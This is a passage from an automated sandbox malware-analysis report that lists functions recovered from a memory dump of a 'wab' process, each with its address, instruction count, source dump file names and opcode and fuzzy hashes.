                    • Instruction Fuzzy Hash: 3EF0F0B1604289DFF30097198C41F2236AFEBC175CF21806AEA098F685E970DC41C298
                    Function 213A656A Relevance: .0, Instructions: 39COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f067fa53fef61b0d0807f4904f50988ed7bfe2fefb3896c759149b613447561e
                    • Instruction ID: cebc2c291a04fe5142a28ca1a6e15260adb2990806d77fc5bbce5193b34e52bf
                    • Opcode Fuzzy Hash: f067fa53fef61b0d0807f4904f50988ed7bfe2fefb3896c759149b613447561e
                    • Instruction Fuzzy Hash: 970181B0244785DFE3128B2CCD48F1537AAEF5AB9CF444194AA45DBBE2EB78E5018610
                    Function 2141437C Relevance: .0, Instructions: 37COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                    • Instruction ID: 453a71c6cc9bce00da336cfe475850534a44bfcda1247d5f413069b7d8434f27
                    • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                    • Instruction Fuzzy Hash: ECF0E932341D134BE7259B299420B1A67569F91F10B49052E960DCB784DF30D8118780
                    Function 213FE872 Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                    • Instruction ID: 5af683079138dce5ce9642ad8d6544ef44fb2eb40616938b3d4dca5e427db5e1
                    • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                    • Instruction Fuzzy Hash: 03F030726115219BD7219A4DCC80F067BEAAB96E64F270079E6089B260C760EC018790
                    Function 213FC89D Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c11912e75aa21d423cd3fc7ed015afa1ded5b2343c3f49fb5d329686f2a98ce
                    • Instruction ID: 837739ffb5d62c26f9e1b859463d55d16396573cc9c5c7109d3a07d1f788ebd5
                    • Opcode Fuzzy Hash: 2c11912e75aa21d423cd3fc7ed015afa1ded5b2343c3f49fb5d329686f2a98ce
                    • Instruction Fuzzy Hash: 11F0C2706093489FC314EF68C441E1BBBE5EF98718F40465EBC99DB390EA38EA00C796
                    Function 213A0854 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                    • Instruction ID: f8e6d27a1bba32c06769b4df016ab07d795f593eef1689efc69c850fab51a5ae
                    • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                    • Instruction Fuzzy Hash: 29F0B472610204AFE714CF25CC01F96BBEEEF9C344F1580789545E71A4FAB0DD01C658
                    Function 213F8D20 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec08b8df957fd95a711ae8714ebbf12eddd0696dfa2936f930596cb4a072d1b5
                    • Instruction ID: eb8cdbf80e69ee750d49b5ff49c94d8bba11fe185915cc56286cbfd3d555209b
                    • Opcode Fuzzy Hash: ec08b8df957fd95a711ae8714ebbf12eddd0696dfa2936f930596cb4a072d1b5
                    • Instruction Fuzzy Hash: E5F0E0321403846FD7155B18DC84B5ABBAEFFA579CF25046AF9592F1718B746C81CB80
                    Function 213FC912 Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1fb649edb1b1f754dd700eb814d2dc43ff0394024249586bac3d1180322671e2
                    • Instruction ID: b488d90259a0e7614c0bb14d72fb514855f70817a676d85b805ccc82e213121a
                    • Opcode Fuzzy Hash: 1fb649edb1b1f754dd700eb814d2dc43ff0394024249586bac3d1180322671e2
                    • Instruction Fuzzy Hash: 60F04F70A0124DEFCB04DF69C555E5EB7F5EF18304F008069A955EB395EA38EB01CB54
                    Function 213747FB Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71f5a4fbedd952f00e2c1174efc1e11f09c1db0e071adc0c8078f97612f10221
                    • Instruction ID: cbd0ee5530037b0cf8caa0ff13c2e7f1cd79f726c2bf7968a63b112eb07db090
                    • Opcode Fuzzy Hash: 71f5a4fbedd952f00e2c1174efc1e11f09c1db0e071adc0c8078f97612f10221
                    • Instruction Fuzzy Hash: 23F0F031D026DCAEE3228B18C040B05BFFA9B0B738F14496AC54D83102D339F982C600
                    Function 21430115 Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fba591f8b0475595af1d421096e221c38e4fbafc183971a1e8f0538e5494d611
                    • Instruction ID: 301e98bc3fd494e0637231da30d95df41fe95e4d032c4ffca114b0da39041d00
                    • Opcode Fuzzy Hash: fba591f8b0475595af1d421096e221c38e4fbafc183971a1e8f0538e5494d611
                    • Instruction Fuzzy Hash: 80F05C26915AC01EDF124F3464903C12F64A7DB918F25124DCCAC57315C97AA9C7C3A4
                    Function 213AC5ED Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7715036c0943302e99d1141b52b2f093d7c01e3050e6e88f3544cd62474e27ee
                    • Instruction ID: 361acaaaff03053d4ef43f0105323cf6e5f719c0cd909705e9f85576f885ee5d
                    • Opcode Fuzzy Hash: 7715036c0943302e99d1141b52b2f093d7c01e3050e6e88f3544cd62474e27ee
                    • Instruction Fuzzy Hash: 2FF0ECB191269D9FE322CB18C144B017BEAEB06BBCF1D956AD44687632C274F880CA50
                    Function 213B2619 Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                    • Instruction ID: 230a35e511fb7ba5b39e4e5ff0216cfdd83113a3020957cbc04e8f26d6643bbe
                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                    • Instruction Fuzzy Hash: 81E092723006012FE7128E598C80F47776FAF92B24F010079B5045E691DAE2AD0982A4
                    Function 21406030 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                    • Instruction ID: eae092bfdfb75a32e0a5d04e1041bf6f85ff6e5e1dda9c9c610d09c56e76122d
                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                    • Instruction Fuzzy Hash: A0F01CB25442149FE315CF16D940F42B7F9EB06364F42C029E6099B661D37AEC40CBA4
                    Function 21370710 Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                    • Instruction ID: 171af41f579df6d10722160436677f26912a0169eeffc4a94d7decab6d901052
                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                    • Instruction Fuzzy Hash: 4FF0E5392087859FD706CF29D050A85BFFAEB5A758F100058E8468B301D735ED82CB50
                    Function 213A49D0 Relevance: .0, Instructions: 28COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                    • Instruction ID: ee69d303d117a3b4188f8a8205080aff2ebd7555f6270dc5b63b5faac942dc02
                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                    • Instruction Fuzzy Hash: CCE0D833244149AFE3211A59C810F5677AFDBD17B4F1A0429EA05DB150DB70DC40C7D8
                    Function 2141678E Relevance: .0, Instructions: 27COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                    • Instruction ID: 5dc272a39b00e480ac8cdfa8697ce6c157b429ba4dd92ddd6b9829b4eee2852f
                    • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                    • Instruction Fuzzy Hash: EDE0DF32A02110FFDB2187998D01F9A7EADDB90FA4F050058BA04E71D4E570DE00C6D0
                    Function 213725E0 Relevance: .0, Instructions: 23COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d02a038fa1065a21e56f4e1a5d0265be2702e3356dd8f447341da4b14f6bf44
                    • Instruction ID: c229ae43120c14585707ec9822c7ac978831d28d7e331fc5f645744d5ecc6a10
                    • Opcode Fuzzy Hash: 3d02a038fa1065a21e56f4e1a5d0265be2702e3356dd8f447341da4b14f6bf44
                    • Instruction Fuzzy Hash: 80E092721006949FC712EF2DDD01F8B77ABEB60378F114515B119571A0CA78BD11C7C4
                    Function 213F4000 Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                    • Instruction ID: a37ddf4d384b6030b9cd4fc701063e5adb7a77b7c70812d6e297173d7f4f671c
                    • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                    • Instruction Fuzzy Hash: DBE052753003469FE705CF19C054B66BBB7BFD6A64F24C079A9488F205EB36E942CB51
                    Function 213ACA38 Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 090fdbf3aea86724857d6d76f856130815fa31efb7e7accbd3d801f4cb6fc10d
                    • Instruction ID: e145600b5ec88c740d54f98a8efa2712eaba4d4d075f6d6dca5159c07ca4a4a4
                    • Opcode Fuzzy Hash: 090fdbf3aea86724857d6d76f856130815fa31efb7e7accbd3d801f4cb6fc10d
                    • Instruction Fuzzy Hash: BAD02B334C50686ED765D618FC14FD33BAFDB40728F024870F10C92021D578CC8182C0
                    Function 2136823B Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                    • Instruction ID: 64b6d601ab3467f1339bdc634ced1bce024ef083568eb08f17e6d427f610c5db
                    • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                    • Instruction Fuzzy Hash: D1E08C31040A54EFDB325F19DC00F4276AFFB68B58F214979E081164A88BB0AD81CE58
                    Function 21372050 Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cd17f6102d8c86424f50f8432ecf7b517f0e4f2b6de4df5705027fb42a9404da
                    • Instruction ID: 76ed9b0a05a12f8dca6173b7ab57a70024184a931a496d5787de266d7139c00d
                    • Opcode Fuzzy Hash: cd17f6102d8c86424f50f8432ecf7b517f0e4f2b6de4df5705027fb42a9404da
                    • Instruction Fuzzy Hash: 13E08C32100590AFC711EB5DDD00E4A73AAEBA5374F114121B154872A0CA78AC01C794
                    Function 213A8A90 Relevance: .0, Instructions: 20COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                    • Instruction ID: 3832f262552e199f7c06a0d384d00a14d0bc3c5b1e194d0051f876b4bfc0b588
                    • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                    • Instruction Fuzzy Hash: CAE08C33121A188BD728EE58D526B62B7E9EF45721F09463EA62787780C634E944CBD8
                    Function 213C6AA4 Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                    • Instruction ID: cf817f4b7c1adc3214495138a91c165224f39e375977e87409c762c74ef17a27
                    • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                    • Instruction Fuzzy Hash: 4ED05E76511A50AFD7328F1FEA00C13BBFAFBC5F10706066EA54683A20C671EC06CBA0
                    Function 213AE59C Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                    • Instruction ID: bb2debc9ab9a6f44b0ed25bbc0e2bc6d1ca6e9eed2ec2077615c4f4dd9d9dbda
                    • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                    • Instruction Fuzzy Hash: 97D0A932A04620AFDB229A1CFC04FC333EAAB88724F160459B008C7250C360EC81CB84
                    Function 213EE908 Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                    • Instruction ID: 901493472e1e6da01b86d75481ec69ff9d8cddbc2f2b8793c99a619b4492d12d
                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                    • Instruction Fuzzy Hash: 09E08C31900780AFCF02CF59D640F4ABBFABF85B44F210068A0085B220C238E800CB40
                    Function 2136A0E3 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                    • Instruction ID: f9bbd78fa16da3d84cde6454e52f60dc1f8d2697ef9eefcb061fce760215552a
                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                    • Instruction Fuzzy Hash: 73D022322120B097CF1847566800F537A1F9B81A9CF16002CF80A93904C4148C82D2E0
                    Function 213AA830 Relevance: .0, Instructions: 14COMMON
                    Download Yara Rule
                    Memory Dump Source
